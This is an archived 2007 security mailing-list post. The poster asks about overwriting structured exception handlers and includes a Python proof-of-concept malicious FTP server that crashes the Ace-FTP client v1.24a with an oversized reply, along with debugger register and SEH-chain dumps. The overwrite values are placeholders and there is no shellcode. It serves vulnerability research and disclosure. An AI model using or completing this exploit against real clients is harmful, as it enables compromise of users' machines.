Vuln Dev
Seh over write Jun 10 2007 08:33PM
KaCo678 aol com
Hey i was wondering if any one would be able to help i have a few question's.About over writing the seh handler's.I have wrote a poc code for an buffer over flow..The problem was i didn't over write the eip but did write to a few registers also there is a few that hold the buffer..My question is.I write to the NEXT_SEH_RECORD so i do a 06 byte jmp.Why ??Do we do a 6 byte jmp.If we do a 6 byte jump doesn't that me when we do pop popret that the pop popwont be excecuted.And lands on the ret.Little confused about that.Also i was wondering haw i would know which 2 registers to pop of the stack.Any help would be great i will provide a poc for what I'm talking about..

My original advisory can be found here.

http://www.milw0rm.com/exploits/4058

#!/usr/bin/python

#######################################################################

#Credit to n00b for finding the bug.

#Ace-Ftp client buffer over flow p0c.

#This is possible to exploit as we

#Smash the seh handlers and there are

#Plenty of registers that had our buffer

#Im still new to seh over writes I haven't

#Had much experience with the seh over write

#But get the Idea from what I've read about

#It..Any way this script creates a listening

#Socket and act's as a ftp server then when the

#Client connect's a huge buffer is sent back to

#The client.Resulting and a buffer overflow.

#If any one feel's like investigating or writing

#A poc for this please do so give some credits to

#n00b.I will give it a try during the week.

#######################################################################

#Shouts: - Str0ke - Marsu - SM - vade79 - c0ntex - Kevin Finisterre

#######################################################################

#Tested:Win xp sp2.

#Version Affected: v1.24a.

###################################################

# \\Debug info//

###################################################

#Program received signal SIGSEGV,Segmentation fault.

#[Switching to thread 1312.0x714]

#0x00403c58 in ?? ()

#

#(gdb) i r

#

#eax 0x41414141 1094795585 <----Eax over written..

#ecx 0x0 0

#edx 0xa5b464 10859620

#ebx 0x41414141 1094795585 <----Ebx over written..

#esp 0x12e458 0x12e458

#ebp 0x12f48c 0x12f48c

#esi 0x12e488 1238152

#edi 0xa5b464 10859620

#eip 0x403c58 0x403c58

#eflags 0x10206 66054

#cs 0x1b 27

#ss 0x23 35

#ds 0x23 35

#es 0x23 35

#fs 0x3b 59

#gs 0x0 0

#fctrl 0xffff1272 -60814

#fstat 0xffff0000 -65536

#ftag 0xffffffff -1

#fiseg 0x0 0

#fioff 0x0 0

#foseg 0xffff0000 -65536

#fooff 0x0 0

###################################################

#What the register look like after crash..

###################################################

#EAX 41414141

#ECX 00000000

#EDX 00A5D930 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA

#EBX 41414141

#ESP 0012E458

#EBP 0012F48C ASCII "AAAAAAAAAAAADDDDEEEECCCCCCC

#ESI 0012E488 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA

#EDI 00A5D930 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA

#EIP 00403C58

###################################################

#DS:[41414141]=???

#EDX=00A5D930, (ASCII "AAAAAAAAAAAAAAAAAAAAAAAAA)

#MOV EDX,DWORD PTR DS:[EAX]

###################################################

#SEH chain of main thread

#Address SE handler

#---------------------------

#0012E46C AceXFTP.00430B9E

#45454545

#---------------------------

#0012F498 44444444 Pointer to next SEH record

#0012F49C 45454545 SE handler

#

#4112byte's to over write Pointer to next SEH record

#next 4 bytes over writes se handler.

###################################################

from socket import *

from struct import pack

host = "127.0.0.1 "

port = 21

Size_of_buf1 = 4112

Size_of_buf2 = 550

s = socket(AF_INET, SOCK_STREAM)

s.bind((host, port))

s.listen(1)

print "\nPort %d open Waiting !!!! ..." % port

cl, addr = s.accept()

print "Vic is connected %s" % addr[0]

buf1 = "A" * Size_of_buf1

NEXT_SEH_RECORD = "\x44\x44\x44\x44"

SE_HANDLER = "\x45\x45\x45\x45"

buf2 = "C" * Size_of_buf2

End = "\r\n"

cl.send(buf1 + NEXT_SEH_RECORD + SE_HANDLER + buf2 + End)

print "mission accomplished : OK\n"

sleep(3)

cl.close()

s.close()

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus